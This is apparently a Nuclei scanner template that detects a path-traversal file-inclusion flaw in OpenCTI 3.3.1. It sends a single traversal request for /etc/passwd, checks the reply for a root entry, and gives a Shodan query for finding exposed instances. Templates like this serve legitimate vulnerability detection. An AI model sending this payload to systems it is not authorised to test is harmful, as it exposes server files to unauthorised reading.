id: opencti-lfi

info:
  name: OpenCTI 3.3.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: OpenCTI 3.3.1 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2020060078
    - https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
  metadata:
    verified: true
    shodan-query: http.html:"OpenCTI"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: opencti,lfi,oss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
